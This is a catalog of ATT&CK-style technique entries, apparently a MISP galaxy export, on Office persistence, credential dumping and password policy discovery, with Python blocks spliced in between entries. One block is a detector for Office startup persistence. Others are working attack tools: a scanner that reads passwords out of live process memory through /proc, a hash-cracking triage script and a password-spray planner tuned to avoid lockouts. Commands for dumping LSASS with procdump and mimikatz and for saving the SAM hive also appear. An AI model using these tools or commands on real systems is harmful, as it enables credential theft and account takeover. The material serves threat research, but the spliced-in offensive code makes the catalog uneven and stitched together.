Word Normal.dotm location:<br> <code>C:\Users\<username>\AppData\Roaming\Microsoft\Templates\Normal.dotm</code>

Excel Personal.xlsb location:<br> <code>C:\Users\<username>\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB</code>

Adversaries may also change the location of the base template to point to their own by hijacking the application’s search order, e.g. Word 2016 will first look for Normal.dotm under <code>C:\Program Files (x86)\Microsoft Office\root\Office16\</code>, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.<sup>[[GlobalDotName Jun 2019](https://app.tidalcyber.com/references/f574182a-5d91-43c8-b560-e84a7e941c96)]</sup>

An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.

The tag is: misp-galaxy:technique="Office Template Macros"

Office Test

Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.<sup>[[Hexacorn Office Test](https://app.tidalcyber.com/references/60d90852-ea00-404d-b613-9ad1589aff31)]</sup><sup>[[Palo Alto Office Test Sofacy](https://app.tidalcyber.com/references/3138f32c-f89c-439c-a8c5-2964c356308d)]</sup>

There exist user and global Registry keys for the Office Test feature:

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf</code>

Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.
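As an added illustration (not part of the MISP galaxy or ATT&CK text), the following Python applies the locations named in the Office Template Macros and Office Test descriptions above to Sysmon-style registry value-set (Event ID 13) and file-create (Event ID 11) events: any value written under Office test\Special\Perf or GlobalDotName is reported, as is any non-Office process creating Normal.dotm or a file in XLSTART (Word and Excel rewrite their own templates routinely, so those writers are ignored). The events are constructed for the example; the per-version Word\Options location assumed for GlobalDotName and the JSON field names are assumptions about the telemetry format.

```python
import json
import re

# Sysmon event IDs used by the sample: 13 = registry value set, 11 = file create.
REGISTRY_SET, FILE_CREATE = 13, 11

# Locations named in the technique descriptions. Each rule: (name, event kind, pattern).
RULES = [
    ("office_test_dll", REGISTRY_SET,
     re.compile(r"\\Software\\Microsoft\\Office test\\Special\\Perf(\\\(Default\))?$", re.I)),
    # Assumed layout: HKU\<SID>\Software\Microsoft\Office\<ver>\Word\Options\GlobalDotName
    ("word_globaldotname", REGISTRY_SET,
     re.compile(r"\\Software\\Microsoft\\Office\\\d+\.\d+\\Word\\Options\\GlobalDotName$", re.I)),
    ("word_normal_template", FILE_CREATE,
     re.compile(r"\\AppData\\Roaming\\Microsoft\\Templates\\Normal\.dotm$", re.I)),
    ("excel_xlstart", FILE_CREATE,
     re.compile(r"\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\[^\\]+$", re.I)),
]

# Office itself rewrites Normal.dotm and PERSONAL.XLSB; a write from anything else is the signal.
OFFICE_IMAGES = {"winword.exe", "excel.exe"}


def analyze(events):
    """Return one finding per event that touches an Office startup location."""
    findings = []
    for ev in events:
        kind = ev["EventID"]
        target = ev.get("TargetObject") if kind == REGISTRY_SET else ev.get("TargetFilename")
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        for name, rule_kind, pattern in RULES:
            if rule_kind != kind or not pattern.search(target or ""):
                continue
            if rule_kind == FILE_CREATE and image in OFFICE_IMAGES:
                continue  # Office saving its own template is routine
            findings.append({"rule": name, "image": image, "target": target,
                             "details": ev.get("Details")})
    return findings


def analyze_jsonl(text):
    """Accept newline-delimited JSON events, the usual export shape for Sysmon forwarders."""
    return analyze(json.loads(line) for line in text.splitlines() if line.strip())


# Constructed sample telemetry (not real events). Backslashes are doubled for JSON.
SAMPLE = r"""
{"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe", "TargetObject": "HKU\\S-1-5-21-1-2-3-1001\\Software\\Microsoft\\Office test\\Special\\Perf\\(Default)", "Details": "C:\\Users\\Public\\perf.dll"}
{"EventID": 13, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetObject": "HKU\\S-1-5-21-1-2-3-1001\\Software\\Microsoft\\Office\\16.0\\Word\\Options\\GlobalDotName", "Details": "\\\\fileserver\\share\\corp.dotm"}
{"EventID": 11, "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "TargetFilename": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm"}
{"EventID": 11, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetFilename": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB"}
{"EventID": 13, "Image": "C:\\Windows\\System32\\svchost.exe", "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive", "Details": "C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"}
"""

if __name__ == "__main__":
    for finding in analyze_jsonl(SAMPLE):
        print(finding)
```

Three of the five sample events fire: the Office Test DLL, the GlobalDotName value pointing at a remote template, and PowerShell dropping PERSONAL.XLSB. WINWORD.EXE saving Normal.dotm and an unrelated Run key do not.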

The tag is: misp-galaxy:technique="Office Test"

Outlook Forms

Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.<sup>[[SensePost Outlook Forms](https://app.tidalcyber.com/references/5d91a713-2f05-43bd-9fef-aa3f51f4c45a)]</sup>

Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.<sup>[[SensePost Outlook Forms](https://app.tidalcyber.com/references/5d91a713-2f05-43bd-9fef-aa3f51f4c45a)]</sup>

The tag is: misp-galaxy:technique="Outlook Forms"

Outlook Home Page

Adversaries may abuse Microsoft Outlook’s Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.<sup>[[SensePost Outlook Home Page](https://app.tidalcyber.com/references/d2758a4b-d326-45a7-9ebf-03efcd1832da)]</sup>

Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.<sup>[[SensePost Outlook Home Page](https://app.tidalcyber.com/references/d2758a4b-d326-45a7-9ebf-03efcd1832da)]</sup>

The tag is: misp-galaxy:technique="Outlook Home Page"

Outlook Rules

Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.<sup>[[SilentBreak Outlook Rules](https://app.tidalcyber.com/references/a2ad0658-7c12-4f58-b7bf-6300eacb4a8f)]</sup>

Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.<sup>[[SilentBreak Outlook Rules](https://app.tidalcyber.com/references/a2ad0658-7c12-4f58-b7bf-6300eacb4a8f)]</sup>

The tag is: misp-galaxy:technique="Outlook Rules"

Office Application Startup

Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.

A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.<sup>[[SensePost Ruler GitHub](https://app.tidalcyber.com/references/aa0a1508-a872-4e69-bf20-d3c8202f18c1)]</sup> These persistence mechanisms can work within Outlook or be used through Office 365.<sup>[[TechNet O365 Outlook Rules](https://app.tidalcyber.com/references/c7f9bd2f-254a-4254-8a92-a3ab02455fcb)]</sup>

The tag is: misp-galaxy:technique="Office Application Startup"

Cached Domain Credentials

Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.<sup>[[Microsoft - Cached Creds](https://app.tidalcyber.com/references/590ea63f-f800-47e4-8d39-df11a184ba84)]</sup>

On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.<sup>[[PassLib mscache](https://app.tidalcyber.com/references/ce40e997-d04b-49a6-8838-13205c54243a)]</sup> The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://app.tidalcyber.com/technique/7e8c3c70-2e9f-4fa0-b083-ff5610447dc1) to recover the plaintext password.<sup>[[ired mscache](https://app.tidalcyber.com/references/5b643e7d-1ace-4517-88c2-96115cac1209)]</sup>

With SYSTEM access, tools such as [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16), [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532), and secretsdump.py can be used to extract the cached credentials.

Note: Cached credentials for Windows Vista are derived using PBKDF2.<sup>[[PassLib mscache](https://app.tidalcyber.com/references/ce40e997-d04b-49a6-8838-13205c54243a)]</sup>

The tag is: misp-galaxy:technique="Cached Domain Credentials"

DCSync

Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller’s application programming interface (API)<sup>[[Microsoft DRSR Dec 2017](https://app.tidalcyber.com/references/43b75a27-7875-4c24-b04d-54e1b60f3028)]</sup> <sup>[[Microsoft GetNCCChanges](https://app.tidalcyber.com/references/410570e4-b578-4838-a25d-f03d92fcf3cb)]</sup> <sup>[[Samba DRSUAPI](https://app.tidalcyber.com/references/79e8f598-9962-4124-b884-eb10f86885af)]</sup> <sup>[[Wine API samlib.dll](https://app.tidalcyber.com/references/d0fdc669-959c-42ed-be5d-386a4e90a897)]</sup> to simulate the replication process from a remote domain controller using a technique called DCSync.

Members of the Administrators, Domain Admins, and Enterprise Admins groups or computer accounts on the domain controller are able to run DCSync to pull password data<sup>[[ADSecurity Mimikatz DCSync](https://app.tidalcyber.com/references/61b0bb42-2ed6-413d-b331-0a84df12a87d)]</sup> from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://app.tidalcyber.com/technique/12efebf8-9da4-446c-a627-b6f95524f1ea) for use in Pass the Ticket<sup>[[Harmj0y Mimikatz and DCSync](https://app.tidalcyber.com/references/2afa76c1-caa1-4f16-9289-7abc7eb3a102)]</sup> or change an account’s password as noted in Account Manipulation.<sup>[[InsiderThreat ChangeNTLM July 2017](https://app.tidalcyber.com/references/3bf24c68-fc98-4143-9dff-f54030c902fe)]</sup>

DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16).<sup>[[GitHub Mimikatz lsadump Module](https://app.tidalcyber.com/references/e188ff4d-a983-4f5a-b9e1-3b0f9fd8df25)]</sup> Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.<sup>[[Microsoft NRPC Dec 2017](https://app.tidalcyber.com/references/05cf36a3-ff04-4437-9209-376e9f27c009)]</sup>

The tag is: misp-galaxy:technique="DCSync"

/etc/passwd and /etc/shadow

Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.<sup>[[Linux Password and Shadow File Formats](https://app.tidalcyber.com/references/7c574609-4b0d-44e7-adc3-8a3d67e10e9f)]</sup>

The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:<sup>[[nixCraft - John the Ripper](https://app.tidalcyber.com/references/5e093b21-8bbd-4ad4-9fe2-cbb04207f1d3)]</sup> <code># /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>
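The unshadow step above, as an added Python example rather than page content: it merges constructed /etc/passwd and /etc/shadow samples into the layout unshadow emits, and triages which accounts are actually worth feeding to a cracker (locked "!"/"*" entries and empty password fields are not hashes, and an empty field is a finding in its own right). The hash strings in the sample are placeholders with the right prefixes, not real digests.

```python
# Constructed sample files; the hash strings are placeholders in the right shape, not real hashes.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/zsh
svc_backup:x:1002:1002::/var/backups:/usr/sbin/nologin
"""

SHADOW = """\
root:$6$rounds=5000$xyzSALT$AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
alice:$y$j9T$abcdefghijklmnop$QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ:19800:0:99999:7:::
bob:!$6$lockSALT$BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB:19800:0:99999:7:::
svc_backup::19800:0:99999:7:::
"""

# crypt(3) prefixes as used by glibc/libxcrypt; the prefix decides which cracker mode applies.
HASH_TYPES = {"$1$": "md5crypt", "$2b$": "bcrypt", "$5$": "sha256crypt",
              "$6$": "sha512crypt", "$7$": "scrypt", "$y$": "yescrypt"}


def parse_colon_file(text, nfields):
    """Parse passwd(5)/shadow(5) style files; malformed lines are skipped, not guessed at."""
    rows = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) == nfields:
            rows[fields[0]] = fields
    return rows


def classify(hash_field):
    """What the shadow password field says about the account."""
    if hash_field == "":
        return "empty"                      # no password set at all
    if hash_field.startswith(("!", "*")):
        return "locked"                     # login via password disabled
    for prefix, name in HASH_TYPES.items():
        if hash_field.startswith(prefix):
            return name
    return "unknown"


def unshadow(passwd_text, shadow_text):
    """Merge like unshadow(8): the passwd record with its 'x' replaced by the shadow hash."""
    passwd = parse_colon_file(passwd_text, 7)
    shadow = parse_colon_file(shadow_text, 9)
    merged = []
    for name, fields in passwd.items():
        hash_field = shadow[name][1] if name in shadow else fields[1]
        merged.append(":".join([name, hash_field] + fields[2:]))
    return merged


def triage(passwd_text, shadow_text):
    """Bucket accounts into crackable / locked / empty / unknown for reporting."""
    passwd = parse_colon_file(passwd_text, 7)
    shadow = parse_colon_file(shadow_text, 9)
    report = {"crackable": [], "locked": [], "empty": [], "unknown": []}
    for name in passwd:
        kind = classify(shadow[name][1]) if name in shadow else "unknown"
        bucket = kind if kind in report else "crackable"
        report[bucket].append((name, kind))
    return report


if __name__ == "__main__":
    print("\n".join(unshadow(PASSWD, SHADOW)))
    print(triage(PASSWD, SHADOW))
```

Only root (sha512crypt) and alice (yescrypt) are worth cracking time here; bob's hash is prefixed with "!" (locked by passwd -l), daemon has "*", and svc_backup has an empty field, which is a misconfiguration to report rather than a hash to crack.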

The tag is: misp-galaxy:technique="/etc/passwd and /etc/shadow"

LSA Secrets

Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.<sup>[[Passcape LSA Secrets](https://app.tidalcyber.com/references/64b0e13f-de5f-4964-bcfa-bb0f6206383a)]</sup><sup>[[Microsoft AD Admin Tier Model](https://app.tidalcyber.com/references/3afba81a-3b1d-41ec-938e-24f055698d52)]</sup><sup>[[Tilbury Windows Credentials](https://app.tidalcyber.com/references/2ddae0c9-910c-4c1a-b524-de3a58dbba13)]</sup> LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.<sup>[[ired Dumping LSA Secrets](https://app.tidalcyber.com/references/cf883397-11e9-4f94-977a-bbe46e3107f5)]</sup>

[Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) can be used to extract from the Registry. [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16) can be used to extract secrets from memory.<sup>[[ired Dumping LSA Secrets](https://app.tidalcyber.com/references/cf883397-11e9-4f94-977a-bbe46e3107f5)]</sup>

The tag is: misp-galaxy:technique="LSA Secrets"

LSASS Memory

Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) using [Use Alternate Authentication Material](https://app.tidalcyber.com/technique/28f65214-95c1-4a72-b385-0b32cbcaea8f).

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.

For example, on the target host use procdump to write a full memory dump of LSASS (ProcDump writes the file as lsass_dump.dmp):

  • <code>procdump -ma lsass.exe lsass_dump</code>

Locally, mimikatz can then be run against the copied dump using:

  • <code>sekurlsa::minidump lsass_dump.dmp</code>

  • <code>sekurlsa::logonPasswords</code>

Built-in Windows tools such as comsvcs.dll (its MiniDump export, invoked through rundll32.exe) can also be used to write the same kind of dump.

Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user’s Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.<sup>[[Graeber 2014](https://app.tidalcyber.com/references/f2f9a6bf-b4d9-461e-b961-0610ea72faf0)]</sup>

SSPs such as MSV, Kerberos, WDigest, and CredSSP can be used to access credentials.

The tag is: misp-galaxy:technique="LSASS Memory"

NTDS

Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.<sup>[[Wikipedia Active Directory](https://app.tidalcyber.com/references/924e1186-57e5-43db-94ab-29afa3fdaa7b)]</sup>

In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.<sup>[[Metcalf 2015](https://app.tidalcyber.com/references/1c899028-466c-49b0-8d64-1a954c812508)]</sup>

The following tools and techniques can be used to obtain the NTDS file and extract the password hashes of every account in Active Directory from it:

  • Volume Shadow Copy

  • secretsdump.py

  • Using the in-built Windows tool, ntdsutil.exe

  • Invoke-NinjaCopy

The tag is: misp-galaxy:technique="NTDS"

Proc Filesystem

Adversaries may gather credentials from the proc filesystem or /proc. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the /proc/<PID>/maps file shows how memory is mapped within the process’s virtual address space. And /proc/<PID>/mem, exposed for debugging purposes, provides access to the process’s virtual address space.<sup>[[Picus Labs Proc cump 2022](https://app.tidalcyber.com/references/e8a50a79-6ca4-5c91-87ad-0b1ba9eca505)]</sup><sup>[[baeldung Linux proc map 2022](https://app.tidalcyber.com/references/b70d04e4-c5f9-5cb2-b896-9bd64e97369e)]</sup>

When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns that are indicative of credentials, such as looking for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.<sup>[[MimiPenguin GitHub May 2017](https://app.tidalcyber.com/references/b10cd6cc-35ed-4eac-b213-110de28f33ef)]</sup><sup>[[Polop Linux PrivEsc Gitbook](https://app.tidalcyber.com/references/a73a2819-61bd-5bd2-862d-5eeed344909f)]</sup>

If running as or with the permissions of a web browser, a process can search the /maps & /mem locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.
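An added Python example (not from the page) that performs the /proc search described above: it parses /proc/<PID>/maps, reads each readable region through /proc/<PID>/mem, and regex-searches it for form-style credentials. The memory reader is injectable so the search logic can be exercised on a constructed memory image; scan_pid does the live version against a real process. The credential pattern, the skip list, and the region-size cap are assumptions for the demo.

```python
import os
import re

# One /proc/<pid>/maps line: start-end perms offset dev inode [path]
MAPS_LINE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+) (\S{4}) \S+ \S+ \S+\s*(.*)$")
SKIP = {"[vvar]", "[vsyscall]"}          # special mappings that fail or are pointless to read
MAX_REGION = 256 << 20                   # assumed cap; skip huge mappings rather than stall

# Form-encoded secrets a web or auth process may keep in memory (case-insensitive).
CRED_PATTERN = re.compile(rb"(?i)(?:password|passwd|pwd)=([!-~]{4,64})")


def parse_maps(text):
    """Return [(start, end, perms, path), ...] for every parseable maps line."""
    regions = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line)
        if m:
            regions.append((int(m.group(1), 16), int(m.group(2), 16), m.group(3), m.group(4)))
    return regions


def scan_regions(regions, read_fn, pattern=CRED_PATTERN):
    """read_fn(address, length) -> bytes. Returns [(address_of_secret, secret), ...]."""
    hits = []
    for start, end, perms, path in regions:
        if "r" not in perms or path in SKIP or end - start > MAX_REGION:
            continue
        try:
            data = read_fn(start, end - start)
        except OSError:
            continue                     # guard pages and unreadable mappings
        for m in pattern.finditer(data):
            hits.append((start + m.start(1), m.group(1)))
    return hits


def scan_pid(pid, pattern=CRED_PATTERN):
    """Live scan via /proc; needs root or ptrace rights over the target (own pid always works)."""
    with open(f"/proc/{pid}/maps") as f:
        regions = parse_maps(f.read())
    fd = os.open(f"/proc/{pid}/mem", os.O_RDONLY)
    try:
        return scan_regions(regions, lambda addr, n: os.pread(fd, n, addr), pattern)
    finally:
        os.close(fd)


if __name__ == "__main__":
    planted = b"username=alice&password=hunter2&submit=1"   # constructed; keeps a secret in our own heap
    for addr, secret in scan_pid(os.getpid()):
        print(f"{addr:#x}: {secret!r}")
```

Run as-is on Linux it scans its own process and reports the planted string (the capture runs to the next non-printable byte, so it includes the trailing form fields; tighten the character class for a specific target). Pointing scan_pid at another PID is where the root or CAP_SYS_PTRACE requirement from the passage bites: the open of /proc/<PID>/mem fails with EACCES otherwise.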

The tag is: misp-galaxy:technique="Proc Filesystem"

Security Account Manager

Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.

Tools such as Mimikatz and secretsdump.py can be used to retrieve SAM hashes through in-memory techniques.

Alternatively, the SAM can be extracted from the Registry with Reg:

  • <code>reg save HKLM\sam sam</code>

  • <code>reg save HKLM\system system</code>

Creddump7 can then be used to process the SAM database locally to retrieve hashes.<sup>[[GitHub Creddump7](https://app.tidalcyber.com/references/276975da-7b5f-49aa-975e-4ac9bc527cf2)]</sup>

Notes:

  • RID 500 account is the local, built-in administrator.

  • RID 501 is the guest account.

  • User accounts start with a RID of 1,000+.

The tag is: misp-galaxy:technique="Security Account Manager"

OS Credential Dumping

Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) and access restricted information.

Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.

The tag is: misp-galaxy:technique="OS Credential Dumping"

Password Policy Discovery

Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks that adhere to the policy (e.g. if the minimum password length is 8, not trying passwords such as 'pass123'; not checking more than 3-4 passwords per account if the lockout threshold is 6, so as not to lock out accounts).

Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as <code>net accounts (/domain)</code>, <code>Get-ADDefaultDomainPasswordPolicy</code>, <code>chage -l <username></code>, <code>cat /etc/pam.d/common-password</code>, and <code>pwpolicy getaccountpolicies</code> <sup>[[Superuser Linux Password Policies](https://app.tidalcyber.com/references/c0bbc881-594a-408c-86a2-211ce6279231)]</sup> <sup>[[Jamf User Password Policies](https://app.tidalcyber.com/references/aa3846fd-a307-4be5-a487-9aa2688d5816)]</sup>. Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to discover password policy information (e.g. <code>show aaa</code>, <code>show aaa common-criteria policy all</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>

Password policies can be discovered in cloud environments using available APIs such as <code>GetAccountPasswordPolicy</code> in AWS <sup>[[AWS GetPasswordPolicy](https://app.tidalcyber.com/references/dd44d565-b9d9-437e-a31a-a52c6a21e3b3)]</sup>.
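Added Python (not part of the page) that turns a discovered policy into the constraints the passage describes: it parses constructed `net accounts` output, filters a candidate list by minimum length and an assumed three-of-four-character-class complexity rule, and sizes a password spray so each account stays below the lockout threshold within one observation window. `net accounts` does not print the complexity setting (Get-ADDefaultDomainPasswordPolicy does), so it is a parameter here; the safety margin of two attempts is an assumption.

```python
import math
import re
import string

# Constructed `net accounts /domain` output in the layout the real command prints.
NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              8
Length of password history maintained:                24
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.
"""

FIELDS = {
    "Minimum password length": "min_length",
    "Lockout threshold": "lockout_threshold",
    "Lockout duration (minutes)": "lockout_minutes",
    "Lockout observation window (minutes)": "window_minutes",
    "Length of password history maintained": "history",
}

CLASSES = (string.ascii_lowercase, string.ascii_uppercase, string.digits, string.punctuation)


def parse_net_accounts(text):
    """Map the labelled lines we care about to ints; 'Never'/'None' become None."""
    policy = {}
    for line in text.splitlines():
        m = re.match(r"^(.+?):\s{2,}(\S.*)$", line)
        if not m:
            continue
        key = FIELDS.get(m.group(1).strip())
        if key:
            value = m.group(2).strip()
            policy[key] = int(value) if value.isdigit() else None
    return policy


def meets_policy(password, policy, complexity=True):
    """Minimum length plus, when complexity is enforced, at least 3 of 4 character classes."""
    if len(password) < (policy.get("min_length") or 0):
        return False
    if complexity and sum(any(c in cls for c in password) for cls in CLASSES) < 3:
        return False
    return True


def spray_plan(policy, candidates, margin=2):
    """Attempts per account per observation window that stay `margin` below the lockout threshold."""
    threshold = policy.get("lockout_threshold")
    if not threshold:                                  # no lockout configured
        return {"per_window": len(candidates), "windows": 1, "minutes": 0}
    per_window = max(1, threshold - margin)
    windows = math.ceil(len(candidates) / per_window)
    wait = policy.get("window_minutes") or 0           # counter resets after the window elapses
    return {"per_window": per_window, "windows": windows, "minutes": (windows - 1) * wait}


if __name__ == "__main__":
    policy = parse_net_accounts(NET_ACCOUNTS)
    words = ["pass123", "password", "Welcome1", "Summer2024!", "Spring2024"]
    usable = [w for w in words if meets_policy(w, policy)]
    print(policy)
    print("policy-compliant candidates:", usable)
    print("spray plan:", spray_plan(policy, usable))
```

With the sample policy, 'pass123' is dropped for length and 'password' for complexity; the three remaining candidates fit in one window at three attempts per account, two below the threshold of five.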

The tag is: misp-galaxy:technique="Password Policy Discovery"

Peripheral Device Discovery

Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.<sup>[[Peripheral Discovery Linux](https://app.tidalcyber.com/references/427b3a1b-88ea-4027-bae6-7fb45490b81d)]</sup><sup>[[Peripheral Discovery macOS](https://app.tidalcyber.com/references/2a3c5216-b153-4d89-b0b1-f32af3aa83d0)]</sup> Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.

The tag is: misp-galaxy:technique="Peripheral Device Discovery"

Cloud Groups

Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.

With authenticated access there are several tools that can be used to find permissions groups. The <code>Get-MsolRole</code> PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts <sup>[[Microsoft Msolrole](https://app.tidalcyber.com/references/e36f4e3a-61c9-4fdc-98de-d51a2b3b4865)]</sup><sup>[[GitHub Raindance](https://app.tidalcyber.com/references/321bba10-06c6-4c4f-a3e0-318561fa0fed)]</sup>.

